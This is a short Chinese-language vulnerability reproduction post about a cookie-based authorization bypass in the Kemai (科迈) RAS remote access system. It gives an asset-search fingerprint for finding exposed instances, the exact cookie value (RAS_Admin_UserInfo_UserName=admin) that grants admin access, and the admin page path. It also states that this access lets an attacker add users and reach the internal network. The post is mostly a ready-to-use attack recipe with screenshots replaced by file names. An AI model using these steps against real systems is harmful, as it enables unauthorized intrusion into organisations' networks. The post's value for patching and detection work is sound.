科迈 RAS系统 Cookie验证越权漏洞

漏洞描述

科迈 RAS系统 存在Cookie验证越权,当 RAS_Admin_UserInfo_UserName 设置为 admin 时可访问后台。

漏洞影响

科迈 RAS系统

网络测绘

app=”科迈-RAS系统”

漏洞复现

登录页面如下

20240331110926843-watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10-20220313112037353.78320197_2024-03-31_11-09-15 (1)

添加Cookie

RAS_Admin_UserInfo_UserName=admin

20240331110954415-watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10-20220313112037181.2f1dff1b_2024-03-31_11-09-46 (1)

访问 /Server/CmxUser.php?pgid=UserList

20240331111043483-watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10-20220313112037479.484d70ef_2024-03-31_11-10-28 (1)

获取后可以添加用户,授权登陆设备直接接入内网

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容